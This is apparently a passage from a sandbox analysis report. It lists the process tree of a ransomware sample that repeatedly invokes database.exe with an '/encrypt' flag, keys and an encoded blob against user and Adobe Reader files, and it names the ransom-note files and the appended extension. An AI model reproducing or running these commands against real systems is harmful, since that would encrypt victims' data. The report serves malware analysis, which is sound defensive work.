                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\Restore-My-Files.txt"
                                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                                          • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                                                                                                                                                                                          PID:2944
                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Setup Files\{AC76BA86-7AD7-1033-7B44-A90000000001}\abcpy.ini.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                                            PID:6732
                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Setup Files\{AC76BA86-7AD7-1033-7B44-A90000000001}\AcroRead.msi.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                                                                                                              PID:6760
                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Setup Files\{AC76BA86-7AD7-1033-7B44-A90000000001}\Data1.cab.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                                                                              PID:6776
                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Setup Files\{AC76BA86-7AD7-1033-7B44-A90000000001}\Restore-My-Files.txt"
                                                                                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                PID:5116
                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Setup Files\{AC76BA86-7AD7-1033-7B44-A90000000001}\Setup.exe.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                  PID:1364
                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Setup Files\{AC76BA86-7AD7-1033-7B44-A90000000001}\setup.ini.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                                                                                  PID:4012
                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\desktop.ini.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                    PID:7076
                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Restore-My-Files.txt"
                                                                                                                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                      PID:6944
                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\deployment.properties.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                        PID:6984
                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\NTUSER.DAT"
                                                                                                                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                          PID:1316
                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\ntuser.dat.LOG1"
                                                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                            PID:6116
                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\ntuser.dat.LOG2"
                                                                                                                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                              PID:5348
                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf"
                                                                                                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                PID:6552
                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms"
                                                                                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:4376
                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms"
                                                                                                                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:5776
                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\ntuser.ini.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:6256
                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Restore-My-Files.txt"
                                                                                                                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:5460
                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Contacts\!HELP_SOS.hta.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:1332
                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Contacts\Admin.contact.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                        5⤵
